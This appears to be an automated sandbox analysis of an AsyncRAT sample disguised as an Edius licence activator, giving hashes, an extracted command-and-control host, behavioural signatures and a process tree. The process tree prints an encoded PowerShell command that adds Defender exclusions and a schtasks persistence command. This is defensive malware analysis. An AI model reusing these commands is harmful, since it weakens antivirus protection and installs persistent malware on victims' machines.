Overview

overview

10

Static

static

3

3c0d368d28...0N.exe

windows7-x64

10

3c0d368d28...0N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 18:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3c0d368d28b89e894e6b568435b7e730N.exe

  • Size

    3.0MB

  • MD5

    3c0d368d28b89e894e6b568435b7e730

  • SHA1

    201419762e874bd24bbefd0dc4e896694432f3a0

  • SHA256

    246229260c7e76ec89aac6111b8eff0c843e9e9044c518fe16830ae37ec3c0ce

  • SHA512

    43d875cc04575ca5bd53bf86ce81082ee848be757da5625e844f7335ffcc7808dd1251e60fded9df564be7e9f9bde42b66b6ccde99b6fd4c8cf7550064df6182

  • SSDEEP

    49152:/r2d6pm/od2TOp/N63fNluPsd3Teg47/OhuGzrI1RgapIqYzC6aQD0+WmQXC/z/:6aErT6/N6PsY0zODzrFapfYzk+Wjgz

Score
10/10
asyncratdefaultdefense_evasiondiscoveryevasionrattrojan

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

mcehonline-48304.portmap.io:48304

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    true

  • install_file

    systems.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 7 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c0d368d28b89e894e6b568435b7e730N.exe
    "C:\Users\Admin\AppData\Local\Temp\3c0d368d28b89e894e6b568435b7e730N.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcwB5ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2684
    • C:\Users\Admin\AppData\Local\Temp\Edius Lisance Activation.exe
      "C:\Users\Admin\AppData\Local\Temp\Edius Lisance Activation.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S ).exe
        "C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S ).exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S )-original.exe
          "C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S )-original.exe"
          4⤵
          • Executes dropped EXE
          PID:2668
    • C:\Users\Admin\AppData\Local\Temp\edius.exe
      "C:\Users\Admin\AppData\Local\Temp\edius.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "systems" /tr '"C:\Users\Admin\AppData\Roaming\systems.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "systems" /tr '"C:\Users\Admin\AppData\Roaming\systems.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1920
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:344
        • C:\Users\Admin\AppData\Roaming\systems.exe
          "C:\Users\Admin\AppData\Roaming\systems.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2496

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Edius Lisance Activation.exe
    Filesize

    800KB

    MD5

    a089f33be71d405c7b685959bf8f1ec5

    SHA1

    4f643ec951b8f6d3ef2cf43057f4ab1bcdf3f95f

    SHA256

    b182cff2f31aa116e9842b3eead80550d7192c3feb3e10654a80ea7ce03e8ea6

    SHA512

    3db359840face4c876a8849fe7b19432e246874d307618602360807550515344f9aaa8c99838bb088fcd9e3516957b451301e3db57b6620cd317080e6d6776a8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S )-original.exe
    Filesize

    389KB

    MD5

    bf08d76373074130cf20e49e44eb953d

    SHA1

    ceb331e5fd002e07b6fc941fe3139cd419d6ffa0

    SHA256

    2cdf94b7b0216a5a83aae835f5b9419e5294853c674483705b83e7373f785f91

    SHA512

    10246ceba7af5ea164d022229c70443eed7f8ca3efbbf9a3b4e1755365a5a27e126dd7d45e82c596072d8c971520abf4c58fe270396f407496841ba888001b68

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ckz_7UMI\Edius ( N C S ).exe
    Filesize

    6KB

    MD5

    9a205daf40416734ec489ca23a9d11c8

    SHA1

    8319c316cafda619192d802163fc25c135633c61

    SHA256

    c17a392df3d8d2a09a8fcd0d14bde2d092b9bfcf9e7159924861eda1cf8257b1

    SHA512

    6f06929c4f73ae505dcaeebbd0163af4b798e5144c5d535e8b42a5d9b40e9707864f3cc0d3d5cb981b6ee163e0b80c7d1253210922b73ce62df4d281fbebfdbf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\edius.exe
    Filesize

    47KB

    MD5

    760c6041134e80eb0a7c9f31ea39391f

    SHA1

    acaaff5eee05faf1842c36048b7fa30351a35ad6

    SHA256

    b584138861ddc6da039cf28f8f16987095ddac24c10e9554a1facd8875436079

    SHA512

    4d7167a19e1a9df47a761023ab71c7339d676d95e3ad9a3f1e5af86e6f522b0629df16e72768dd680313ff12d8ec448ab1f1f603e84b033d27314b5e4d67cfb9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat
    Filesize

    151B

    MD5

    b3ba013ea8bc418aebec6fadd09767ee

    SHA1

    515b61515d21864dff2d5ac226305ca82e3f6300

    SHA256

    e7d61d5cd8420992b009674c0b6c8ead200f85e1bd8a5692d4ee93b86528c360

    SHA512

    8b250b86d38017d2cacb6573d978728d14451f1b2b5638ba523a698e2cacf9618912b1ef6732353ecc29b5eccffe3a3122a80832c7bedb219310c183ff30a505

    Download Submit

  • memory/2496-56-0x0000000000850000-0x0000000000862000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2668-42-0x00000000008A0000-0x000000000090A000-memory.dmp

    Filesize

    424KB

    Download

  • memory/2668-43-0x00000000004B0000-0x0000000000500000-memory.dmp

    Filesize

    320KB

    Download

  • memory/2792-39-0x0000000000AE0000-0x0000000000AF2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2856-38-0x0000000000360000-0x0000000000368000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2968-4-0x0000000000400000-0x0000000000A46000-memory.dmp

    Filesize

    6.3MB

    Download

  • memory/2968-2-0x0000000000401000-0x00000000004B3000-memory.dmp

    Filesize

    712KB

    Download

  • memory/2968-1-0x0000000077540000-0x0000000077542000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2968-0-0x0000000000400000-0x0000000000A46000-memory.dmp

    Filesize

    6.3MB

    Download